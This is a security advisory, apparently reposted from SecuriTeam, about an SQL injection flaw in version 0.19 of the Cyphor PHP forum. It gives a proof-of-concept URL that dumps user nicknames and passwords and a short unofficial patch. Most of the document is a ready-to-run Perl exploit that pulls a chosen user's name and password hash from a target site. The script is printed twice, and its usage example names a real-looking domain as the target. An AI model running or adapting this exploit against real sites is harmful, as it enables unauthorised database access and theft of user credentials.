来自:SecuriTeam
Summary
Cyphor is "a configurable Webforum, which uses PHP4's session capabilities to authenticate users, the MySQL database system to store all its data in, and Cascading Style Sheets (CSS) to configure the "Look and Feel" of the forum".
An SQL injection vulnerability has been discovered in Cyphor, allowing remote attackers to execute arbitrary SQL statements.
Credit:
The information has been provided by HACKERS PAL.
Details
Vulnerable Systems:
* Cyphor version 0.19
Proof of concept:
The following sample can be used to test your system for the mentioned vulnerability:
http://vulnerable/show.php?fid=2&id=-10 union select id,null,null,null,null,nick,password,null,null,null from users where id=1
Solution:
The product has been discontinued.
Unofficial patch:
Following the line:
$message_mode = 1;
Add
// Script Protection By : HACKERS PAL
$id=intval($id);
if(!$id)
{
die("<br>We Dont allow Skript Kidz .. <br> By <a hre='Http://www.sqor.net'>HACKERS PAL</a>");
}
// !/script Porotection By : HACKERS PAL fINISHED
Exploit:
#!/bin/env perl
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n###########################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] 1 #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n###########################\n";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n###########################\n";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "show.php?fid=2&id=-0%20union%20select%20id,2,3," . "4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
$page =~ m/(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n###########################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] 1 #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n###########################\n";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n###########################\n";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "show.php?fid=2&id=-0%20union%20select%20id,2,3," . "4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
$page =~ m/(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished
